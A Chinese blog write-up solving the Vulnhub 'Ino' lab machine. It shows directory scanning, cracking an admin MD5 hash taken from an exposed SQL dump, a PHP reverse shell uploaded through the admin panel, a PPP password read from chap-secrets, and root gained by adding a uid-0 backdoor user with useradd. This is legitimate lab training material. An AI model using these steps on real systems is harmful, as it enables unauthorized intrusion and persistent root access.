首页 > 其他分享 >Vulnhub之Ino靶机详细解题过程

Vulnhub之Ino靶机详细解题过程

时间:2022-11-25 16:23:26浏览次数:47  
标签:gt quot -- lt Ino Vulnhub 靶机 NULL md5

Ino

作者: jason_huawen

靶机基本信息

名称:INO: 1.0.1

地址:

https://www.vulnhub.com/entry/ino-101,601/

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.77.0/16   |   Screen View: Unique Hosts                                                        

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:12:e3:78      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.219  08:00:27:a7:0f:c9      1      60  PCS Systemtechnik GmbH   

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.218

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.219 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-24 09:55 EST
Nmap scan report for localhost (192.168.56.218)
Host is up (0.00030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
|   256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_  256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:A7:0F:C9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ nikto -h http://192.168.56.219/lot/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.219
+ Target Hostname:    192.168.56.219
+ Target Port:        80
+ Start Time:         2022-11-25 02:11:28 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated:  19 error(s) and 6 item(s) reported on remote host
+ End Time:           2022-11-25 02:12:10 (GMT-5) (42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 

                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.219/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/25 02:12:31 Starting gobuster in directory enumeration mode
===============================================================
/lot                  (Status: 301) [Size: 314] [--> http://192.168.56.219/lot/]
/server-status        (Status: 403) [Size: 279]
Progress: 217184 / 220561 (98.47%)===============================================================
2022/11/25 02:12:59 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.219/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,txt,sh,php
[+] Timeout:                 10s
===============================================================
2022/11/25 02:13:13 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.56.219/: Get "http://192.168.56.219/": dial tcp 192.168.56.219:80: connect: connection refused
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.219/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2022/11/25 02:13:30 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 302) [Size: 1] [--> /lot/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/lot                  (Status: 301) [Size: 314] [--> http://192.168.56.219/lot/]
/server-status        (Status: 403) [Size: 279]
Progress: 1100246 / 1102805 (99.77%)===============================================================
2022/11/25 02:15:56 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/lot -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.219/lot
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2022/11/25 02:16:19 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 17722]
/about.php            (Status: 200) [Size: 679]
/home.php             (Status: 200) [Size: 5188]
/header.php           (Status: 200) [Size: 1894]
/admin                (Status: 301) [Size: 320] [--> http://192.168.56.219/lot/admin/]
/assets               (Status: 301) [Size: 321] [--> http://192.168.56.219/lot/assets/]
/footer.php           (Status: 200) [Size: 4393]
/css                  (Status: 301) [Size: 318] [--> http://192.168.56.219/lot/css/]
/database             (Status: 301) [Size: 323] [--> http://192.168.56.219/lot/database/]
/js                   (Status: 301) [Size: 317] [--> http://192.168.56.219/lot/js/]
/head.php             (Status: 200) [Size: 0]
/reserve.php          (Status: 200) [Size: 2518]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
Progress: 1101943 / 1102805 (99.92%)===============================================================
2022/11/25 02:18:57 Finished
===============================================================

经过一番目录文件扫描后,发现了一个目录/database,在该目录下有文件:

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ curl http://192.168.56.219/lot/database/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /lot/database</title>
 </head>
 <body>
<h1>Index of /lot/database</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/lot/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="lot_db.sql">lot_db.sql</a></td><td align="right">2020-10-20 09:59  </td><td align="right"> 12K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.219 Port 80</address>
</body></html>

将数据库文件lot_db.sql下载到Kali Linux本地,查看发现有用户名和密码:

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ mv ~/Downloads/lot_db.sql .
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ cat lot_db.sql 
-- phpMyAdmin SQL Dump
-- version 5.0.2
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: Oct 20, 2020 at 03:59 AM
-- Server version: 10.4.14-MariaDB
-- PHP Version: 7.2.33

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `lot_db`
--

-- --------------------------------------------------------

--
-- Table structure for table `division`
--

CREATE TABLE `division` (
  `id` int(30) NOT NULL,
  `name` varchar(100) NOT NULL,
  `description` text NOT NULL,
  `map_img` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `division`
--

INSERT INTO `division` (`id`, `name`, `description`, `map_img`) VALUES
(3, 'Phase 1', 'Sample', '1603089660_devSitePlansTileMobile02.jpg'),
(4, 'Phase 2 ', 'Sample only', '1603089960_devSitePlansTileMobile01.jpg');

-- --------------------------------------------------------

--
-- Table structure for table `lots`
--

CREATE TABLE `lots` (
  `id` int(30) NOT NULL,
  `division_id` int(30) NOT NULL,
  `marker_position` text NOT NULL,
  `model_id` int(30) NOT NULL,
  `lot` text NOT NULL,
  `type` tinyint(1) NOT NULL DEFAULT 1 COMMENT '1=lot ,2= house and lot',
  `details` text NOT NULL,
  `price` float NOT NULL,
  `status` tinyint(1) NOT NULL DEFAULT 1 COMMENT '0=unavailable,1=available,2 = reserve'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `lots`
--

INSERT INTO `lots` (`id`, `division_id`, `marker_position`, `model_id`, `lot`, `type`, `details`, `price`, `status`) VALUES
(2, 3, '{\"top\":\"200px\",\"left\":\"233px\"}', 1, 'Lot 1 Block 1', 2, '&lt;b&gt;Area: 6400 sq. ft.&lt;/b&gt;&lt;p&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;sample&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;sample&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;sample&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;sample&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;&quot;&gt;Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam pretium tortor a sem ultrices faucibus. Aenean placerat efficitur venenatis. Sed eros metus, imperdiet sit amet mauris eget, vehicula pellentesque justo. Proin ac nunc sed est ornare placerat. Mauris quis orci fringilla mauris imperdiet mattis.&lt;/span&gt;&lt;b&gt;&lt;/p&gt;&lt;/p&gt;', 15000, 0),
(3, 4, '{\"top\":\"148px\",\"left\":\"248px\"}', 0, 'Lot 2 Block 1', 1, 'Sample only', 500000, 1),
(4, 4, '{\"top\":\"85px\",\"left\":\"363px\"}', 1, 'Lot 23 Block 6', 2, '&lt;ul&gt;&lt;li&gt;Sample&lt;/li&gt;&lt;li&gt;Sample&lt;/li&gt;&lt;li&gt;sample&lt;/li&gt;&lt;li&gt;Test&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;b style=&quot;margin: 0px; padding: 0px; color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;Lorem Ipsum&lt;/b&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;&amp;nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&amp;#x2019;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.&lt;/span&gt;&lt;br&gt;&lt;/p&gt;', 2300000, 1);

-- --------------------------------------------------------

--
-- Table structure for table `model_houses`
--

CREATE TABLE `model_houses` (
  `id` int(30) NOT NULL,
  `title` varchar(250) NOT NULL,
  `description` text NOT NULL,
  `cover` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `model_houses`
--

INSERT INTO `model_houses` (`id`, `title`, `description`, `cover`) VALUES
(1, 'Two-Story House', '&lt;b&gt;Area:150 sq. m.&lt;/b&gt;&lt;p&gt;&lt;ul&gt;&lt;li&gt;3 Bed Rooms&lt;/li&gt;&lt;li&gt;1 Comfort Room each Floor&lt;/li&gt;&lt;li&gt;Kitchen Area&lt;/li&gt;&lt;li&gt;Dining Area&lt;/li&gt;&lt;li&gt;Sample&lt;/li&gt;&lt;li&gt;Sample&lt;/li&gt;&lt;/ul&gt;&lt;/p&gt;', '1603095120_images.jpg'),
(2, 'Sample Model House', '&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam pretium tortor a sem ultrices faucibus. Aenean placerat efficitur venenatis. Sed eros metus, imperdiet sit amet mauris eget, vehicula pellentesque justo. Proin ac nunc sed est ornare placerat. Mauris quis orci fringilla mauris imperdiet mattis. Nam nibh leo, sollicitudin eget massa ut, consectetur pellentesque nulla. Curabitur quis mi faucibus, interdum elit sed, auctor ex. Aenean elementum ac lorem ut feugiat. Praesent varius, tortor consectetur varius iaculis, erat sem malesuada velit, in lobortis dolor nibh mollis lectus. Etiam elementum sodales ultricies. Donec non odio non urna laoreet malesuada. Donec tincidunt, purus id condimentum dapibus, tortor risus venenatis leo, in molestie lorem ante ut dui. Mauris pulvinar augue nisl, ut commodo leo blandit tristique. In hac habitasse platea dictumst. Nunc semper, nisi ac aliquet lacinia, eros massa dapibus lacus, eu interdum turpis mi vitae nisi.&lt;/span&gt;&lt;p&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;sample&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;sample&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;sample&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;sample&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;sample&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; text-align: justify;&quot;&gt;sample&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/p&gt;', '1603095180_images.jpg');

-- --------------------------------------------------------

--
-- Table structure for table `reserved`
--

CREATE TABLE `reserved` (
  `id` int(30) NOT NULL,
  `lot_id` int(30) NOT NULL,
  `firstname` varchar(100) NOT NULL,
  `middlename` varchar(100) NOT NULL,
  `lastname` varchar(100) NOT NULL,
  `email` varchar(100) NOT NULL,
  `contact` varchar(100) NOT NULL,
  `address` text NOT NULL,
  `message` text NOT NULL,
  `status` tinyint(1) NOT NULL DEFAULT 1 COMMENT '0=declined/backed out,1= reserved,2=confimed',
  `date_created` datetime NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `reserved`
--

INSERT INTO `reserved` (`id`, `lot_id`, `firstname`, `middlename`, `lastname`, `email`, `contact`, `address`, `message`, `status`, `date_created`) VALUES
(2, 2, 'Jsmith', 'C', 'Smith', '[email protected]', '0123456548', 'Sample', 'Sample only', 2, '2020-10-20 09:12:10');

-- --------------------------------------------------------

--
-- Table structure for table `system_settings`
--

CREATE TABLE `system_settings` (
  `id` int(30) NOT NULL,
  `name` text NOT NULL,
  `email` varchar(200) NOT NULL,
  `contact` varchar(20) NOT NULL,
  `cover_img` text NOT NULL,
  `about_content` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `system_settings`
--

INSERT INTO `system_settings` (`id`, `name`, `email`, `contact`, `cover_img`, `about_content`) VALUES
(1, 'Lot Reservation Management System', '[email protected]', '+6948 8542 623', '1603096200_1602738120_pngtree-purple-hd-business-banner-image_5493.jpg', '&lt;p style=&quot;text-align: center; background: transparent; position: relative;&quot;&gt;&lt;span style=&quot;color: rgb(0, 0, 0); font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-weight: 400; text-align: justify;&quot;&gt;&amp;nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&rsquo;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.&lt;/span&gt;&lt;br&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center; background: transparent; position: relative;&quot;&gt;&lt;br&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center; background: transparent; position: relative;&quot;&gt;&lt;br&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;');

-- --------------------------------------------------------

--
-- Table structure for table `users`
--

CREATE TABLE `users` (
  `id` int(30) NOT NULL,
  `name` text NOT NULL,
  `username` varchar(200) NOT NULL,
  `password` text NOT NULL,
  `type` tinyint(1) NOT NULL DEFAULT 3 COMMENT '1=Admin,2=Staff, 3= subscriber'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `users`
--

INSERT INTO `users` (`id`, `name`, `username`, `password`, `type`) VALUES
(1, 'Administrator', 'admin', '0192023a7bbd73250516f069df18b500', 1);

--
-- Indexes for dumped tables
--

--
-- Indexes for table `division`
--
ALTER TABLE `division`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `lots`
--
ALTER TABLE `lots`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `model_houses`
--
ALTER TABLE `model_houses`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `reserved`
--
ALTER TABLE `reserved`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `system_settings`
--
ALTER TABLE `system_settings`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `users`
--
ALTER TABLE `users`
  ADD PRIMARY KEY (`id`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `division`
--
ALTER TABLE `division`
  MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `lots`
--
ALTER TABLE `lots`
  MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `model_houses`
--
ALTER TABLE `model_houses`
  MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `reserved`
--
ALTER TABLE `reserved`
  MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `system_settings`
--
ALTER TABLE `system_settings`
  MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
  MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
COMMIT;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ 
 

在该文件中有用户名admin, 以及加密后的密码:0192023a7bbd73250516f069df18b500

用hash-identifier工具识别一下该加密算法:

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   [email protected] #
   #########################################################################
--------------------------------------------------
 HASH: 0192023a7bbd73250516f069df18b500

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
 HASH: ^C

        Bye!
                                        

识别出加密算法为MD5后,用在线的MD5解密网站解密:

https://www.cmd5.com/

得到密码为admin123

而在目录扫描时,我们已经发现了/admin入口,利用用户名和密码登录:

接下来设法找到php shell文件的上传入口。

Division List找到一个可以上传文件的入口,没有报错,再看一下如何访问shell.php

只要点击 view,即可成功得到反弹回来的shell

──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.219] 37322
Linux ino 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux
 07:29:55 up  3:08,  0 users,  load average: 0.00, 0.74, 1.50
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ino:/$ 

www-data@ino:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Oct 10  2020 .
drwxr-xr-x 18 root root 4.0K Oct 27  2020 ..
drwxr-xr-x  2 ppp  ppp  4.0K Dec  5  2020 ppp
www-data@ino:/home$ cd ppp
cd ppp
www-data@ino:/home/ppp$ ls -alh
ls -alh
total 24K
drwxr-xr-x 2 ppp  ppp  4.0K Dec  5  2020 .
drwxr-xr-x 3 root root 4.0K Oct 10  2020 ..
lrwxrwxrwx 1 root root    9 Dec  5  2020 .bash_history -> /dev/null
-rw-r--r-- 1 ppp  ppp   220 Oct 10  2020 .bash_logout
-rw-r--r-- 1 ppp  ppp  3.5K Oct 10  2020 .bashrc
-rw-r--r-- 1 ppp  ppp   807 Oct 10  2020 .profile
-rw-r--r-- 1 ppp  ppp    33 Dec  5  2020 local.txt
www-data@ino:/home/ppp$ cat local.txt
cat local.txt
f29cea45f473ebfa834885c4ff70ec1a
www-data@ino:/home/ppp$ 

得到了用户flag

提权

搜寻了一番,找到了数据库连接文件:

www-data@ino:/var/www/html/lot/admin$ cat db_connect.php
cat db_connect.php
<?php 

$conn= new mysqli('localhost','lot','lot','lot_db')or die("Could not connect to mysql".mysqli_error($con));
www-data@ino:/var/www/html/lot/admin$ mysql -ulot -p
mysql -ulot -p
Enter password: lot

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 179
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

成功登录数据库,但是没找到方法通过数据库提权,事实上PPP是一种服务,再找相关的文件:

www-data@ino:/var/www/html/lot/admin$ cd /etc/ppp
cd /etc/ppp
www-data@ino:/etc/ppp$ ls -alh
ls -alh
total 68K
drwxr-xr-x  7 root dip  4.0K Oct 26  2020 .
drwxr-xr-x 94 root root 4.0K Dec  6  2020 ..
-rw-r--r--  1 root root  101 Oct 26  2020 chap-secrets
-rwxr-xr-x  1 root root 1.8K Feb 20  2020 ip-down
drwxr-xr-x  2 root root 4.0K Oct 26  2020 ip-down.d
-rwxr-xr-x  1 root root 1.9K Feb 20  2020 ip-up
drwxr-xr-x  2 root root 4.0K Oct 26  2020 ip-up.d
-rwxr-xr-x  1 root root  784 Feb 20  2020 ipv6-down
drwxr-xr-x  2 root root 4.0K Feb 20  2020 ipv6-down.d
-rwxr-xr-x  1 root root  922 Feb 20  2020 ipv6-up
drwxr-xr-x  2 root root 4.0K Feb 20  2020 ipv6-up.d
-rw-r--r--  1 root root  13K Feb 20  2020 options
-rw-------  1 root root 1.6K Oct 26  2020 pap-secrets
drwxr-s---  2 root dip  4.0K Oct 26  2020 peers
www-data@ino:/etc/ppp$ cat chap-secrets
cat chap-secrets
# Secrets for authentication using CHAP
# client        server  secret                  IP addresses
ppp     *       ESRxd7856HVJB   *


看到了ppp用户的密码,切换到ppp用户,然后利用useradd命令创建超级用户:

ppp@ino:~$ sudo useradd -p `openssl passwd 123456` hacker -o -u 0 -g root -G root -s /bin/sh -d /home/hacker
< -o -u 0 -g root -G root -s /bin/sh -d /home/hacker
ppp@ino:~$ su - hacker
su - hacker
Password: 123456

su: warning: cannot change directory to /home/hacker: No such file or directory
# cd /root
cd /root
# ls 
ls 
proof.txt
# cat proof.txt
cat proof.txt
21bae0a12690199cde7a65bff57723a5
# 

成功提权!

标签:gt,quot,--,lt,Ino,Vulnhub,靶机,NULL,md5
From: https://www.cnblogs.com/jason-huawen/p/16925514.html

相关文章

  • Arduino Wire.requestFrom 函数读取没有反应
    目录前言过程参考文章前言在读取DA217传感器ID的时候,发现把需要读取的寄存器地址写过去之后,再用Wire.requestFrom去读取就没有反应了(程序不会继续运行,会卡死到此处)......
